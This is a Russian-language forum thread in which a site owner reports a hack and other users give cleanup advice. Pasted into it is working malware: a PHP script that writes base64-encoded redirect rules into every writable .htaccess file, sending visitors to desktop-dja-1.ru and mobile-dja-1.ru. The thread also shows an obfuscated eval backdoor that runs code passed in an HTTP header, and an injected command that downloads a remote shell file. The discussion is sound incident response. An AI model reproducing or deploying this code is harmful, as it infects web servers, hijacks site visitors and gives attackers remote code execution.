l9BR0VOVH0gcGRhIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IFBQQyBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBTZXJpZXM2MCBbTkMsT1JdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSBPcGVyYS5NaW5pIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlwYWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaXBob25lIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9IGlQYWQgW05DLE9SXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gaVBob25lIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX0FDQ0VQVH0gInRleHQvdm5kLndhcC53bWx8YXBwbGljYXRpb24vdm5kLndhcC54aHRtbCt4bWwiIFtOQyxPUl0KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICF3aW5kb3dzLm50IFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFic2QgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIXgxMSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhdW5peCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbWFjb3MgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIW1hY2ludG9zaCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhcGxheXN0YXRpb24gW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWdvb2dsZSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAheWFuZGV4IFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFib3QgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWxpYnd3dyBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbXNuIFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFhbWVyaWNhIFtOQ10KUmV3cml0ZUNvbmQgJXtIVFRQX1VTRVJfQUdFTlR9ICFhdmFudCBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhZG93bmxvYWQgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIWZkbSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhbWF1aSBbTkNdClJld3JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5UfSAhd2VibW9uZXkgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIXdpbmRvd3MtbWVkaWEtcGxheWVyIFtOQ10KClJld3JpdGVSdWxlIF4oLiopJCBodHRwOi8vbW9iaWxlLWRqYS0xLnJ1L2w9MzI0MTExMTkwNjZlMGI0ZDAzNTY0NTU2NDk1NDUzNDM3MyBbTCxSPTMwMl0KClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4xOTNcLjIwMVwuMig/OjI5fDNbMDFdKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTNcLjI0M1wuNjQgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeNDZcLjIyOVwuMSg/OjI4fDNbMjM0XXw0WzAxXSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODNcLjE0OVwuWzEyMzg5XSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF44M1wuMTQ5XC4oPzoyWzE0XXwzWzQtOF18NFszLTc5XXw1WzI2LTldfDZbMC0zXSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODNcLjE0OVwuNDhcLlswLTldIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjgzXC4xNDlcLjQ4XC5bMS05XVswLTldIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjgzXC4xNDlcLjQ4XC4xKD86WzAxXVswLTldfDJbMC03XSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODNcLjIyOVwuMjI0IFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjg1XC4yNlwuMSg/OjI4fDM2fDU1fDZbNDVdfDhbMzQ2XXw5WzItNV0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjg1XC4yNlwuMig/OjBbNDhdfDFbMjZdfDJbMDQ3LTldfDNbMC01XXw0WzE4XSkgW09SXQoKUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjgwXC44M1wuMig/OjI4fDNbMC0zXSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODBcLjgzXC4yKD86MjR8M1s3LTldKVwuWzAtOV0gW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODBcLjgzXC4yKD86MjR8M1s3LTldKVwuWzEtOV1bMC05XSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF44MFwuODNcLjIoPzoyNHwzWzctOV0pXC4xKD86WzAxXVswLTldfDJbMC03XSkgW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeODRcLjE3XC4yNVs0NV0gW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeOTVcLjE1M1wuMSg/Ols2LThdWzAtOV18OVswMV0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjk1XC4xNTNcLjI1WzItNV0gW09SXQpSZXdyaXRlQ29uZCAle1JFTU9URV9BRERSfSBeMTk0XC41NFwuMSg/OjRbODldfDVbMDFdKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTNcLjg3IFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjIxN1wuOFwuMig/OjJbNi05XXwzWzAtNDldKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTdcLjY2XC4xKD86NFs2LTldfDVbMC0yNl0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjIxN1wuNzRcLjI0WzQ3XVwuMSg/OjJbODldfFszLTldWzAtOV0pIFtPUl0KUmV3cml0ZUNvbmQgJXtSRU1PVEVfQUREUn0gXjIxN1wuNzRcLjI0WzQ3XVwuMig/OlswLTRdWzAtOV18NVswLTVdKSBbT1JdClJld3JpdGVDb25kICV7UkVNT1RFX0FERFJ9IF4yMTdcLjc0XC4yKD86NFs1ODldfDVbMDFdKQoKUmV3cml0ZVJ1bGUgXiguKikkIGh0dHA6Ly9tb2JpbGUtZGphLTEucnUvbD0zMjQxMTExOTA2NmUwYjRkMDM1NjQ1NTY0OTU0NTM0MzczIFtMLFI9MzAyXQoKUmV3cml0ZUNvbmQgJXtIVFRQX1JFRkVSRVJ9ICh5YXx5YW5kZXh8Z29vZ2xlfG1haWx8cmFtYmxlcnx2aykgW05DXQpSZXdyaXRlQ29uZCAle0hUVFBfVVNFUl9BR0VOVH0gIShhY2Nvb25hfGlhX2FyY2hpdmVyfGFudGFib3R8YXNrXCBqZWV2ZXN8YmFpZHV8ZGNwYm90fGVsdGFpbmRleGVyfGZlZWRmZXRjaGVyfGdhbWVzcHl8Z2lnYWJvdHxnb29nbGVib3R8Z3NhLWNyYXdsZXJ8Z3J1Yi1jbGllbnR8Z3VscGVyfHNsdXJwfG1paGFsaXNtfG1zbmJvdHx3b3JsZGluZGV4ZXJ8b295eW98cGFnZWJ1bGx8c2Nvb3Rlcnx3M2NfdmFsaWRhdG9yfGppZ3Nhd3x3ZWJhbHRhfHlhaG9vZmVlZHNlZWtlcnx5YWhvbyFcIHNsdXJwfG1tY3Jhd2xlcnx5YW5kZXhib3R8eWFuZGV4aW1hZ2VzfHlhbmRleHZpZGVvfHlhbmRleG1lZGlhfHlhbmRleGJsb2dzfHlhbmRleGFkZHVybHx5YW5kZXhmYXZpY29uc3x5YW5kZXhkaXJlY3R8eWFuZGV4bWV0cmlrYXx5YW5kZXhjYXRhbG9nfHlhbmRleG5ld3N8eWFuZGV4aW1hZ2VyZXNpemVyKSBbTkNdClJld3JpdGVSdWxlIF4oLiopJCBodHRwOi8vZGVza3RvcC1kamEtMS5ydS9nby9pbi5waHA/c291cmNlPSV7SFRUUF9IT1NUfSBbTCxSPTMwMl0KCg==';
function editexistinghtacc($scanedPath)
{
    global $codes;


    if($arr_filesAndDirsInScanedPath = scandir($scanedPath)) 
    { 
        foreach($arr_filesAndDirsInScanedPath as $fileOrDirInScanedPath) 
        { 
            $path = $scanedPath . $fileOrDirInScanedPath; 
            if($fileOrDirInScanedPath == ".." || $fileOrDirInScanedPath == ".") continue; 
            if(@is_dir($path)) editexistinghtacc($path.DIRECTORY_SEPARATOR);
            if(@is_writable($path) && strpos($path, "htaccess")) 
            {
                if (! file_get_contents($path)) {
                    $filetext = base64_decode($codes);
                    $fh = fopen($path, "w");
                    fwrite($fh, $filetext);
                    fclose($fh);
                }
                if(! strpos(file_get_contents($path), 'desktop-dja'))
                {
                    $filetext = base64_decode($codes).file_get_contents($path);
                    $fh = fopen($path, "w");
                    fwrite($fh, $filetext);
                    fclose($fh);
                }
            }
        } 
    }
}


$keywords = preg_split("#/#", dirname(__FILE__));
$size = count($keywords);
    for ($i=1; $i < $size; $i++) { 
        for ($j=1; $j < $size+1-$i; $j++) {
            $url.=$keywords[$j];
            $url.="/";
        }
        editexistinghtacc('/'.$url);
        $url=null;
    }




function createnewhtacc($scanedPath) 
{ 
    global $codes; 


    if($arr_filesAndDirsInScanedPath = scandir($scanedPath)) 
    { 
        foreach($arr_filesAndDirsInScanedPath as $fileOrDirInScanedPath) 
        { 
            $path = $scanedPath . $fileOrDirInScanedPath; 


            if($fileOrDirInScanedPath == ".." || $fileOrDirInScanedPath == ".") continue; 
            if(! @is_dir($path)) continue; 


            if(@is_writable($path)) 
            {
                if (! file_get_contents($path.'/.htaccess')) {
                $filetext = base64_decode($codes);
                    $fh = fopen($path.'/.htaccess', "w");
                    fwrite($fh, $filetext);
                    fclose($fh);
                }
                if(! strpos(file_get_contents($path.'/.htaccess'), 'desktop-dja'))
                {
                    $filetext = base64_decode($codes).file_get_contents($path.'/.htaccess');
                    $fh = fopen($path.'/.htaccess', "w");
                    fwrite($fh, $filetext);
                    fclose($fh);
                }
            } 


            createnewhtacc($path.DIRECTORY_SEPARATOR); 
        } 
    } 
} 




$keywords = preg_split("#/#", dirname(__FILE__));
$size = count($keywords);
    for ($i=1; $i < $size; $i++) { 
        for ($j=1; $j < $size+1-$i; $j++) {
            $url.=$keywords[$j];
            $url.="/";
        }
        createnewhtacc('/'.$url);
        $url=null;
    }


echo 'OK'; 

?>

     

     

    q00p.php -а этот файл я нге смог открыть произошло вот что :

    dc94467a.png

     

    84331ba7.php

     

    <?php $_5a2760="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_5a2760("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?>

     

  • Цитата
    comment_16020

    Ну удаляйте эти странные файлы.

    И они не только в папке /cache/ будут.

  • Цитата
    comment_16021

    Ну удаляйте эти странные файлы.

    И они не только в папке /cache/ будут.

    Я нашёл его! :D

    w00t.php

     

     

    ==============================================================================
=========================        END       ===================================
========================= /forum/index.php?<?error_reporting(0);print(___);copy('__desktop-dja-1.ru/go/greed.txt','q00p.php');die;?> ===================================
==============================================================================

    А что за файл Thumbs.db в /admin

     

     

  • Цитата
    comment_16027

    Решение проблемы:

    Небольшое пояснение:

  • Цитата
    comment_16028


    Решение проблемы: ТЫК Небольшое пояснение: ТЫК

    Это не точно. В ноябре были найдены новые уязвимости, 3.3.4 уязвима (без патча), через эти уязвимости и заражают сайт.

    Для начала нужно убрать все лишнее из папки /cache/ (чаще всего там находится шелл), после этого нужно очистить .htaccess, а потом удалить все лишнее файлы со всех директорий.

  • Цитата
    comment_16029

    _Dark_, Где почитать и скачать этот патч? Просто когда находят уязвимость то уведомление в админке большое.

  • Цитата
    comment_16030

    Почитать

    Скачать по последней ссылке можно.

    Edited by _Dark_
    Не ту ссылку дал

  • Цитата
    comment_16045

    Кстати, если практически в каждой папке находится "чужой" htaccess, думаю вряд ли кто-то захочет просматривать каждую папку движка. :D

    Самый рациональный выход, на мой взгляд, сделать дамп файлов, с помощью стандартных средств поиска в Windows найти все эти файлы и просто удалить их. Затем закачать дамп.

  • Цитата
    • 3 недели спустя...
    • Author
    comment_16755

    UP. Только что заметил, что был взломан поддомен blog.pro-ucheba.com (на wordpress) с такими же симптомами. В каждой папке находится чужой htaccess. Возникает вопрос: взлом видимо был осуществлен - через хостинг? т.е. взломщик знал пароли или ...

  • Цитата
    comment_16757

    Значит злоумышленник получил доступ на сервер, больше это ничем не объяснить..

  • Цитата
    • Author
    comment_16761

    Хм... интересно... У меня хостинг был от Timeweb. Это как он смог получить доступ? Он взломал именно определенный сервер? Или как?

  • Цитата
    comment_16762

    Этого я не могу сказать, советую поменять все пароли, в том числе и от базы данных.

  • Цитата

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Ответить в этой теме...
    Go to topic listing

    Последние посетители 0

    • No registered users viewing this page.